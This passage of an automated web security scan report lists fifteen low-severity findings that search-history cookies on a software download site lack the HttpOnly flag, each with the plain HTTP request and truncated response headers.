Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.846. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-google-groups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-google-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.847. http://www.x64bitdownload.com/64-bit-grabber-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.848. http://www.x64bitdownload.com/64-bit-group-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-group-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-group-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.849. http://www.x64bitdownload.com/64-bit-groups-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-groups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.850. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-highspeed-connection-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-highspeed-connection-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.851. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-image-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-image-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91637


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.852. http://www.x64bitdownload.com/64-bit-images-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-images-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-images-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.853. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.854. http://www.x64bitdownload.com/64-bit-internet-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-internet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.855. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-kill-file-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-kill-file-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.856. http://www.x64bitdownload.com/64-bit-killfile-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-killfile-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-killfile-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.857. http://www.x64bitdownload.com/64-bit-mp3-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-mp3-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-mp3-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.858. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multimedia-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-multimedia-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92538


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.859. http://www.x64bitdownload.com/64-bit-multipart-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multipart-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-multipart-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73514


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.860. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:35 GMT
Cache-Control: max-age=600
Pragma: cache
